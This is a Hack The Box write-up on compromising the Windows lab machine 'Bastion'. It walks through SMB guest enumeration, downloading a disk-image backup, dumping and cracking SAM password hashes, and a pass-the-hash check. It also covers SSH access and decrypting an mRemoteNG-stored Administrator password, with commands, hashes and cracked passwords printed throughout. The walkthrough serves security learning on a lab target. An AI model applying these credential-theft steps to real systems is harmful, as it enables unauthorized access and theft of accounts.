Hack The Box Write-up: Bastion

This is my first in a series of write-ups on systems I've successfully exploited on HackTheBox. Bastion is a Windows host that at the time of writing has been rated fairly easy by other hackers, which was my experience as well. However, this system was still a fun system to exploit with a novel way of getting user access.

Enumeration

First things first, let's nmap the box to see what services the box has running.

root@kali:bastion# nmap -p- -sV 10.10.10.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-05 20:49 EDT
Nmap scan report for 10.10.10.134
Host is up (0.060s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.64 seconds

One of the first things that stands out to me is that this host has OpenSSH listening on port 22. Microsoft recently integrated OpenSSH into Windows, but this is the first time I've seen it running as a service on a Windows host in the wild. We can't do anything with SSH right now, but this does indicate that this host is a Windows 10 or Windows Server 2016 or 2019 box, since OpenSSH is only available on this flavor of Windows. We will come back to this service later on in the write-up.

SMB

Other than SSH and WinRM, the only other listening useful service is SMB. For SMB, I usually use a mix of enum4linux and smbmap to try to enumerate information about listening shares and the level of access provided by the server. First, I tried enumerating access using an anonymous logon, which would be rare on such a modern version of Windows, but is still worth a shot.

root@kali:smb# enum4linux 10.10.10.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Aug  5 20:58:24 2019

--snip--
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

Unfortunately, anonymous access didn't get us anything. It has, thankfully, gotten progressively more difficult to set up anonymous SMB shares in Windows over the years, so this is pretty realistic. One other thing I like to try to enumerate access is by using the built-in Guest account with no password. Let's give that a shot.

root@kali:smb# enum4linux -u Guest 10.10.10.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Aug  5 21:01:33 2019

--snip--
 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.134    |
 ==================================================== 
[E] Can't find workgroup/domain


 ===================================== 
|    Session Check on 10.10.10.134    |
 ===================================== 
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.134 allows sessions using username 'Guest', password ''
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.10.134    |
 =========================================== 
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 359.
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Mon Aug  5 21:01:44 2019

It looks like the server allows connections as Guest! Running enum4linux with the -a parameter only listed what shares the Guest user is able to access, and nothing else helpful.

root@kali:smb# enum4linux -a -u Guest 10.10.10.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Aug  5 21:03:25 2019

--snip--

 ========================================= 
|    Share Enumeration on 10.10.10.134    |
 ========================================= 
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 640.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
Failed to connect with SMB1 -- no workgroup available

--snip--

I didn't expect to be able to access the default administrative shares (ADMIN$, C$, and IPC$), and attempting to connect using smbclient confirmed that. However, the Backups share seems interesting to us. Let's see what's inside that share.

root@kali:smb# smbclient -U Guest //10.10.10.134/Backups
Enter WORKGROUP\Guest's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Aug  5 21:09:35 2019
  ..                                  D        0  Mon Aug  5 21:09:35 2019
  ASwYWuILip                          D        0  Mon Aug  5 20:51:59 2019
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  oTWBZwpEdv                          D        0  Mon Aug  5 20:51:50 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  tmp                                 A      116  Mon Aug  5 21:09:35 2019
  WindowsImageBackup                  D        0  Fri Feb 22 07:44:02 2019

		7735807 blocks of size 4096. 2788438 blocks available

This confirms what the name of the share suggests: this share is used for backups by other systems in this scenario. The other folders and files are artifacts of various SMB scanners verifying read/write access on the share, which are left behind because the Guest user can only read and create files on the share, not delete them. note.txt contains the following text: Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow. I believe this is a hint to help transfer files that we find later on. Looking further into the WindowsImageBackup folder, there appears to be a single backup for the L4mpje-PC system performed on February 22, 2019. L4mpje is the name of the creator of this box, so we're on the right track. Listing the contents of the directory for this backup reveals two large files, as well as some other metadata:

smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
  .                                   D        0  Fri Feb 22 07:45:32 2019
  ..                                  D        0  Fri Feb 22 07:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd      A 37761024  Fri Feb 22 07:44:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd      A 5418299392  Fri Feb 22 07:45:32 2019
  BackupSpecs.xml                     A     1186  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml      A     1078  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml      A     8930  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml      A     6542  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml      A     2894  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml      A     1488  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml      A     1484  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml      A     3844  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml      A     3988  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml      A     7110  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml      A  2374620  Fri Feb 22 07:45:32 2019

		7735807 blocks of size 4096. 2788327 blocks available

The two vhd's at the top are very attractive targets, but the size of the download caused timeouts that caused the download to fail at first. Using the timeout command and setting the value to a much bigger timeout allows these files to be downloaded.

Disk image forensics

I had trouble mounting the first disk image, but it turns out the second disk image was the more important one anyway, as it has the Windows filesystem on it.

root@kali:smb# guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/disk1
root@kali:smb# cd /mnt/disk1
root@kali:disk1# ls
$Recycle.Bin autoexec.bat config.sys Documents and Settings pagefile.sys PerfLogs ProgramData Program Files Recovery System Volume Information Users Windows

Looking around the filesystem, it appears to be a very basic install of Windows with no other programs installed and the user L4mpje as a local administrator. We can extract the hashes for users from the registry using the pwdump tool. This tool uses the SECURITY and SAM hives of the registry and outputs the user information and hashes in a format that looks like /etc/shadow on Linux systems, which is what John The Ripper expects.

root@kali:disk1# cd Windows/System32/config
root@kali:config# pwdump SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Using pth-smbclient, we verify that the hash extracted from the SAM database matches the hash on Bastion.

root@kali:bastion# pth-smbclient -U L4mpje%aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 //10.10.10.134/Backups
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Try "help" to get a list of possible commands.
smb: \> ls 
  .                                   D        0  Mon Aug  5 21:09:35 2019
  ..                                  D        0  Mon Aug  5 21:09:35 2019
  ASwYWuILip                          D        0  Mon Aug  5 20:51:59 2019
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  oTWBZwpEdv                          D        0  Mon Aug  5 20:51:50 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  tmp                                 A      116  Mon Aug  5 21:09:35 2019
  WindowsImageBackup                  D        0  Fri Feb 22 07:44:02 2019

		7735807 blocks of size 4096. 2788438 blocks available

I exported the hash information to a file and passed that to John The Ripper using the rockyou.txt wordlist, and was able to recover the password for the L4mpje user.

root@kali:bastion# john hashes --show --format=nt
Administrator::500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:bureaulampje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

3 password hashes cracked, 0 left

User own

We are able to SSH into the host using the recovered L4mpje password, getting us a nice cmd.exe shell over SSH.

root@kali:bastion# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password:
[screen clear]
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>

Looking around the system, we see there's a couple more programs installed on this box than L4mpje-PC.

l4mpje@BASTION C:\Users\L4mpje>cd ..\..
l4mpje@BASTION C:\>cd "Program Files (x86)"
l4mpje@BASTION C:\Program Files (x86)>dir
 Volume in drive C has no label.                      
 Volume Serial Number is 0CB3-C487
 
 Directory of C:\Program Files (x86)

22-02-2019  15:01    <DIR>          .                       
22-02-2019  15:01    <DIR>          ..                       
16-07-2016  15:23    <DIR>          Common Files                       
23-02-2019  10:38    <DIR>          Internet Explorer                       
16-07-2016  15:23    <DIR>          Microsoft.NET                       
22-02-2019  15:01    <DIR>          mRemoteNG                       
23-02-2019  11:22    <DIR>          Windows Defender                       
23-02-2019  10:38    <DIR>          Windows Mail                       
23-02-2019  11:22    <DIR>          Windows Media Player                       
16-07-2016  15:23    <DIR>          Windows Multimedia Platform                       
16-07-2016  15:23    <DIR>          Windows NT                       
23-02-2019  11:22    <DIR>          Windows Photo Viewer                       
16-07-2016  15:23    <DIR>          Windows Portable Devices                       
16-07-2016  15:23    <DIR>          WindowsPowerShell                       
               0 File(s)              0 bytes                       
              14 Dir(s)  11.418.263.552 bytes free

mRemoteNG is an open source remote connections manager, similar to RoyalTS or RDCMan. You configure connections with credentials in mRemoteNG, and simplify connections to remote hosts. We can find the configuration data for mRemoteNG under the AppData folder in L4mpje's user directory.

l4mpje@BASTION C:\Program Files (x86)> cd ..\Users\L4mpje\AppData\Roaming\mRemoteNG
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG

22-02-2019  15:03    <DIR>          .
22-02-2019  15:03    <DIR>          ..
22-02-2019  15:03             6.316 confCons.xml
22-02-2019  15:02             6.194 confCons.xml.20190222-1402277353.backup
22-02-2019  15:02             6.206 confCons.xml.20190222-1402339071.backup
22-02-2019  15:02             6.218 confCons.xml.20190222-1402379227.backup
22-02-2019  15:02             6.231 confCons.xml.20190222-1403070644.backup
22-02-2019  15:03             6.319 confCons.xml.20190222-1403100488.backup
22-02-2019  15:03             6.318 confCons.xml.20190222-1403220026.backup
22-02-2019  15:03             6.315 confCons.xml.20190222-1403261268.backup
22-02-2019  15:03             6.316 confCons.xml.20190222-1403272831.backup
22-02-2019  15:03             6.315 confCons.xml.20190222-1403433299.backup
22-02-2019  15:03             6.316 confCons.xml.20190222-1403486580.backup
22-02-2019  15:03                51 extApps.xml
22-02-2019  15:03             5.217 mRemoteNG.log
22-02-2019  15:03             2.245 pnlLayout.xml
22-02-2019  15:01    <DIR>          Themes
              14 File(s)         76.577 bytes
               3 Dir(s)  11.417.452.544 bytes free

Administrator own

Because this is a functional openSSH server, we can exfiltrate files using SCP just like on a Linux host.

root@kali:bastion# scp L4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml ./
L4mpje@10.10.10.134's password: 
confCons.xml                               100% 6316   110.0KB/s   00:00
root@kali:bastion# cat confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" 
EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" 
Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" 
ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" 
	Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" 
	Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" 
	Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" 
	ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" 
	RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" 
	--snip-- />
    --snip--
</mrng:Connections>

The config file contains information about an RDP connection locally as Administrator, including a base64 encoded encrypted blob as the password. A quick Internet search reveals that there is a simple Python script available on GitHub to decrypt the password.

root@kali:bastion# python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2

Now that we have the Administrator password, we can SSH into the host with Administrative privileges, root owning this box.

root@kali:bastion# ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password
[screen clear]
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>

Summary

This box was a pretty simple box overall but with some fun puzzles, like figuring out how to deal with exfiltrating large files over SMB, and decrypting the password used by mRemoteNG. SMB is usually thought about from a pentesting perspective as a service that, if vulnerable, can be used to easily own a box as SYSTEM. This box was a great exercise in using SMB the way it was intended to exfiltrate information.